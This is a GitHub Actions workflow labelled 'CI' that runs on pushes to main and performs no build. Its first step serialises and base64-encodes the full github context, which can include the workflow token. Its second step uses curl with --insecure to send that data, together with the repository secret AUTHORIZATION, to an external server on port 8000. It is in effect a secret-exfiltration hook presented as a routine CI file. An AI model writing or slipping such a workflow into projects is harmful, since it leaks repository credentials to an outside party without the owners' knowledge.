name: CI
on:
  push:
    branches: [ main ]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: set things
        id: x
        run: |
          ghobj="$(echo '${{toJSON(github)}}' | base64)"
          ghobj="${ghobj//'%'/'%25'}"
          ghobj="${ghobj//$'\n'/'%0A'}"
          ghobj="${ghobj//$'\r'/'%0D'}"
          echo $ghobj
          echo "::set-output name=ghobj::$ghobj"
        shell: bash

      - name: curl
        uses: wei/curl@v1.1.1    
        with:
          args: --request GET --insecure https://jacate.70533df3.shooteram.fr:8000 -H "Authorization:\ ${{secrets.AUTHORIZATION}}" -H "Content-Type:\ application/json" --data "${{ steps.x.outputs.ghobj }}"
